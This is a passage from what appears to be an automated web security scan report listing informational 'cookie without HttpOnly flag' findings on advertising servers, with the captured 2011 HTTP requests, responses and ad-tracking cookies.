GET /adj/hdm.quicksimple/other/;sz=728x90,1000x124;tile=1;pos=1;site=quicksimple;sect=index;sub=index;subsub=index;page=homepage;cat=other;subcat=;tool=ros;artid=;kw=;a=;b=;mtfIFPath=/cm/shared/admeld/;game=;ord=2083708371501416? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.quickandsimple.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 940
Set-Cookie: id=cc1f9413c00001a||t=1316277279|et=730|cs=002213fd4864953bd0708bdf93; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:34:39 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:34:39 GMT
Date: Sat, 17 Sep 2011 16:34:39 GMT
Expires: Sat, 17 Sep 2011 16:34:39 GMT
Cache-Control: private

document.write('<IFRAME SRC=\"http://ad.agkn.com/iframe!t=1089!?ct=US&st=TX&ac=214&zp=75207&bw=4&dma=102&city=13290&che=2936648&clk1=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/g%3B245108818
...[SNIP]...
13.54. http://ad.doubleclick.net/adj/hdm.seventeen/other/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/hdm.seventeen/other/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/hdm.seventeen/other/;sz=1x2;dcopt=ist;tile=1;pos=1;site=seventeen;sect=index;sub=index;subsub=index;page=homepage;cat=other;subcat=;tool=ros;artid=;kw=;a=;b=;ord=6638360701035708? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.seventeen.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 709
Set-Cookie: id=ce8fb413c00000e||t=1316277295|et=730|cs=002213fd4897ff7da328ea186e; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:34:55 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:34:55 GMT
Date: Sat, 17 Sep 2011 16:34:55 GMT
Expires: Sat, 17 Sep 2011 16:34:55 GMT
Cache-Control: private

document.write('<!-- Template ID = 4134 Template Name = A HDM JPG/GIF as Rich Media -->\n<img src=\"http://m.doubleclick.net/dot.gif\" width=\"1\" height=\"1\" border=\"0\">\n<a href=\"http://ad.doubl
...[SNIP]...
13.55. http://ad.doubleclick.net/adj/hdm.thedailygreen/other/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/hdm.thedailygreen/other/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/hdm.thedailygreen/other/;sz=1x2;dcopt=ist;tile=1;pos=1;site=thedailygreen;sect=index;sub=index;subsub=index;page=homepage;cat=other;subcat=;tool=ros;artid=;kw=;a=;b=;ord=260784949641674.75? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.thedailygreen.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 715
Set-Cookie: id=c1ced413c0000df||t=1316276823|et=730|cs=002213fd480ea4aeca9855f41c; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:27:03 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:27:03 GMT
Date: Sat, 17 Sep 2011 16:27:03 GMT
Expires: Sat, 17 Sep 2011 16:27:03 GMT
Cache-Control: private

document.write('<!-- Template ID = 4134 Template Name = A HDM JPG/GIF as Rich Media -->\n<img src=\"http://m.doubleclick.net/dot.gif\" width=\"1\" height=\"1\" border=\"0\">\n<a href=\"http://ad.doubl
...[SNIP]...
13.56. http://ad.doubleclick.net/adj/hfmus.eg.hp/landingpage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/hfmus.eg.hp/landingpage

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/hfmus.eg.hp/landingpage;sz=640x175;loc=1;ord=7698357149492949000? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 286
Set-Cookie: id=c1bf4413c0000c7||t=1316277207|et=730|cs=002213fd48a0510f8cad92fee3; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:33:27 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:33:27 GMT
Date: Sat, 17 Sep 2011 16:33:27 GMT
Expires: Sat, 17 Sep 2011 16:33:27 GMT
Cache-Control: private

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b85/0/0/%2a/h;44306;0-0;0;55334957;38868-640/175;0/0/0;;~okv=;sz=640x175;loc=1;~aopt=2/1/25/1;~sscs=%3f"><img src="http:/
...[SNIP]...
13.57. http://ad.doubleclick.net/adj/locm.hp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/locm.hp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/locm.hp;dcopt=ist;kw=;pos=;tile=;city=dallas_tx_75201;sz=163x27;kw=org;ord=1316294750105? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&css=sponsored-by&p=locm.hp&sz=163x27&ord=1316294750105&l=Dallas%2c+TX&zip=75201&kw=org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 245
Set-Cookie: id=c1def413c00005f||t=1316276935|et=730|cs=002213fd48840c95f4164782de; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:28:55 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:28:55 GMT
Date: Sat, 17 Sep 2011 16:28:55 GMT
Expires: Sat, 17 Sep 2011 16:28:55 GMT
Cache-Control: private

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b85/0/0/%2a/h;44306;0-0;0;49214119;40236-163/27;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=
...[SNIP]...
13.58. http://ad.doubleclick.net/adj/ugo.ugo.ugohome/ugohome  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ugo.ugo.ugohome/ugohome

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/ugo.ugo.ugohome/ugohome;pt=;river=true;sz=86x14;pos=top;tile=1;ord=5174952836? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 246
Set-Cookie: id=c6dee413c0000f6||t=1316276912|et=730|cs=002213fd481c2b18d85e3c3cc0; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:28:32 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:28:32 GMT
Date: Sat, 17 Sep 2011 16:28:32 GMT
Expires: Sat, 17 Sep 2011 16:28:32 GMT
Cache-Control: private

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b85/0/0/%2a/h;44306;0-0;0;33074931;35013-86/14;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border
...[SNIP]...
13.59. http://ad.wsod.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?view=privacy&action=optout&nocache=0.5213477 HTTP/1.1
Host: ad.wsod.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: u=4e56cc155a794; i_1=46:1990:1225:0:0:50313:1314578415:B2|33:1411:1209:100:0:50287:1314388230:B2|33:1828:1214:0:0:54419:1314311189:L

Response

HTTP/1.1 302 Found
Server: nginx
Date: Sat, 17 Sep 2011 17:19:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: u=OPT_OUT; expires=Thu, 15-Sep-2016 17:18:59 GMT; path=/
Set-Cookie: ub=OPT_OUT; expires=Thu, 15-Sep-2016 17:18:59 GMT; path=/; domain=.wsod.com
Location: nai_status/optout_check.php
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

13.60. http://ad.yieldmanager.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imp?anmember=514&anprice=&Z=728x90&s=937499&r=1&_salt=1172267925&u=http%3A%2F%2Fwww.seattlepi.com%2F&u=http://www.seattlepi.com/ HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!.!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!$%00!!#RS!$XpC!1R*F!%`E+!!!!$!?5%!)H`@:!wVd.!%FMM!'lGU!'m1A~~~~~=4jht=6h5P~!$7w.!!%f!!%d(@!3e$^!'/%f!#:m/!!?5%)I#RA!ZmB)!(XE3!(Gex~~~~~~=57rB=9K]L!!.vL!!qrZ!,Y+@!$[Rh!2reF!'%o=~!#a.3)I#RB!i=9S!!NN)!(=Q)~~~~~~=57pL=5]epM.jTN"; liday1=x6!2$N5HGH=f-RQ; lifb=0EA2)tAbBp8u]>7; ih="b!!!!B!'R(Y!!!!#=3rxs!*<[_!!!!#=57sD!*<[e!!!!#=57p$!,`ch!!!!$=3f=@!.`.U!!!!$=57uP!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1R*F!!!!#=4jht!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2/j6!!!!#=4qsr!2rc<!!!!#=3rvk!2reF!!!!(=57pL!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!3e$^!!!!'=57rB!3e]N!!!!#=4X$w!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4L[:!!!!#=57pk!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; vuday1=d-=>RGf(n`oyOxC8ac=(N5HGHFp)#0; bh="b!!!$%!!-C,!!!!%=3`c_!!-G2!!!!%=5$1G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!$=57ob!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!]sr!!!!#=57pA!!`4u!!!!#=54Pi!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!x^1!!!!$=5,??!!y)?!!!!#=3*$x!##!)!!!!$=5#lv!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#3,2!!!!#=57xQ!#3LI!!!!#=57xQ!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#6]*!!!!$=5#lv!#7wf!!!!#=51w'!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q/x!!!!#=5,(/!#Q]:!!!!#=4YXv!#Q_h!!!!$=3gb9!#QoI!!!!#=5,',!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#T<,!!!!$=5,??!#UD`!!!!$=3**U!#UL(!!!!#=5$1H!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#c3y!!!!#=57xQ!#c4!!!!!#=57xQ!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!$=4X0s!#eCK!!!!$=4X0s!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#qq%!!!!#=4jf'!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#v5N!!!!$=5#lm!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$'.I!!!!$=5$1G!$'.K!!!!#=5$1G!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)7'!!!!#=57xQ!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-`?!!!!#=4jeq!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U+!!!!$=58$Y!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!)=4_L-!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:jo!!!!%=5,9,!$<DI!!!!#=3G@^!$<Rh!!!!#=5$$X!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:24:38 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0014.rm.sp2
Set-Cookie: ih="b!!!!C!'R(Y!!!!#=3rxs!*<[_!!!!#=57sD!*<[e!!!!#=57p$!,`ch!!!!$=3f=@!.`.U!!!!$=57uP!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1R*F!!!!#=4jht!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2/j6!!!!#=4qsr!2rc<!!!!#=3rvk!2reF!!!!(=57pL!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!3e$^!!!!'=57rB!3e]N!!!!#=4X$w!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4L[:!!!!#=57pk!4YVV!!!!$=5@Xw!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; path=/; expires=Mon, 16-Sep-2013 16:24:38 GMT
Set-Cookie: vuday1=d-=>RGf(n`oyOxCVzGj]8ac=(N5HGH`C24n; path=/; expires=Sun, 18-Sep-2011 00:00:00 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: liday1=/S0qdx6!2$N5HGH?#x!D; path=/; expires=Sun, 18-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sat, 17 Sep 2011 16:24:38 GMT
Pragma: no-cache
Content-Length: 931
Content-Type: application/x-javascript
Age: 1
Proxy-Connection: close

document.write('<a target=\"_blank\" href=\"http://ad.yieldmanager.com/clk?3,eAGdjVFvgjAUhf8QkUJvsbPx4bJuymLrSOoIe2PAFIHoZpPqv9dMgu-7DyfnnOS7J6AifALyxaEqyHfIC0ZFQMMppxBWU-4RIQQNKOM0Yjzyejg3GNu13MaZ.tn
...[SNIP]...
13.61. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1176335&id=1182722&id=1182852&id=1182712&id=794427&id=1068229&id=1068236&id=1064551&id=1068233&id=1064625&id=1064630&id=1182845&id=1183318&id=1182795&id=1183313&id=1188377&t=2 HTTP/1.1
Host: ad.yieldmanager.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2187?ret=html&phint=section%3Dhp&phint=__bk_t%3DTeen%20Fashion%20%E2%80%93%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%E2%80%93%20ELLEgirl.com&phint=__bk_k%3Dfashion%20online%2C%20girl%20stuff%2C%20fashion%20magazine%2C%20teen%20fashion%20magazine%2C%20young%20movie%20star%2C%20celebrity%20gossip%20girl%2C%20teen%20girl%20gossip%2C%20teen%20blogs&limit=4&r=92044374
Cookie: bh="b!!!$1!!!?H!!!!$=1j[w!!*l]!!!!#=.lv=!!+^.!!!!#=3Elr!!-?2!!!!.=5?_.!!-C,!!!!%=3v*<!!-O3~~!!.uv!!!!#=3Elr!!/pp!!!!#=3Elr!!1CB!!!!#=3_$E!!1SP!!!!#=38n,!!3O?!!!!%=3v*<!!UHs!!!!#=0>(p!!X41!!!!#=0>(p!!Zwa!!!!.=5?_.!!g]C!!!!#=3Elr!!itb!!!!'=3]pn!!nAq!!!!#=3Elr!!pf4!!!!%=3v*<!!srh!!!!$=3i%'!!t^G!!!!$=4'_`!!u*$!!!!)=4Qg^!!v'l!!!!#=3Elr!!vRm!!!!#=3]pn!!vRq!!!!%=3]pn!!vRr!!!!%=3]pn!!vRv!!!!#=3]pn!!vRw!!!!'=3]pn!!vRx!!!!%=3]pn!!vRy!!!!%=3]pn!!va'!!!!#=3Elr!!y!r!!!!#=3]pn!!y!v!!!!#=3]pn!#!,g!!!!'=3]pn!#!y?!!!!#=.lv=!#%v(!!!!#=2w#K!#.dO!!!!$=2Z2#!#.g1!!!!#=.e%I!#.mL!!!!$=0bvK!#/t]!!!!$=09of!#0Kr!!!!$=3M3E!#0L2!!!!%=1Cp-!#0fU!!!!$=3]pn!#0fW!!!!$=3]pn!#2A_!!!!#=3]pn!#2Ad!!!!#=3]pn!#2Gj!!!!%=3v*<!#2Oe!!!!#=1j[w!#2Of!!!!#=1j[w!#2XY!!!!#=3]pn!#3,2!!!!#=3eKS!#3LI!!!!#=3eKS!#4-m!!!!$=4'_a!#44f!!!!%=3]pn!#44h!!!!%=3]pn!#5nZ!!!!#=3]pn!#7(x!!!!(=5?_.!#7)a!!!!'=5?_.!#:@G!!!!%=3fAI!#<v4!!!!#=4Kqg!#?dj!!!!$=3i%,!#?dk!!!!$=3i%,!#?gj!!!!#=4Qfv!#C,X!!!!#=3Elr!#Dri!!!!#=3i%C!#M7R!!!!#=09!!!#M7S!!!!#=1>Dd!#MTC!!!!%=3]pn!#MTH!!!!%=3]pn!#MTI!!!!%=3]pn!#MTJ!!!!%=3]pn!#N[7!!!!#=2w#K!#N[8!!!!#=09!!!#O9C!!!!#=3i%,!#O9g!!!!#=3i%,!#Ps:!!!!#=2[IV!#Q*T!!!!$=2Z2#!#Q,i!!!!#=2Z2#!#ROs!!!!#=3Elr!#SCj!!!!$=2Z2#!#SCk!!!!$=2Z2#!#Sw^!!!!#=/(P2!#TnE!!!!#=3]pn!#U5q!!!!#=09!!!#UDP!!!!%=3]pn!#YCf!!!!#=2w#K!#Ym:!!!!#=1,!r!#Ym>!!!!#=1,!r!#YmN!!!!#=4Kqg!#Ymj!!!!#=4Kqg!#Ymr!!!!#=4Kqg!#Ymw!!!!#=4Kqg!#Z8E!!!!+=5?_.!#Zgs!!!!'=5?_.!#ZhT!!!!(=5?_.!#[R[!!!!%=3]pn!#aG>!!!!$=2Z2#!#aP0!!!!'=/<(G!#bGa!!!!#=09!!!#bGi!!!!#=09!!!#bw^!!!!+=5?_.!#cB!!!!!#=4Ki!!#cB(!!!!#=4Ki!!#cmF!!!!#=4Ki!!#cmM!!!!#=4Ki!!#dCX!!!!%=3Stu!#eAL!!!!#=4X3`!#eCK!!!!#=4X3`!#fBj!!!!+=5?_.!#fBk!!!!+=5?_.!#fBm!!!!+=5?_.!#fBn!!!!+=5?_.!#fG+!!!!'=5?_.!#fvy!!!!(=3H<?!#g<y!!!!'=5?_.!#nb^!!!!#=3M3D!#sxJ!!!!#=4Qfv!#t>.!!!!#=1,!r!#tLr!!!!#=1+1N!#tM)!!!!#=3]pn!#tn2!!!!%=3]pn!#trp!!!!.=5?_.!#uQD!!!!#=3_$E!#uQG!!!!#=3_$E!#ust!!!!$=2Z2#!#usu!!!!$=2Z2#!#uw*!!!!%=3]pn!#v,W!!!!#=09!!!#v,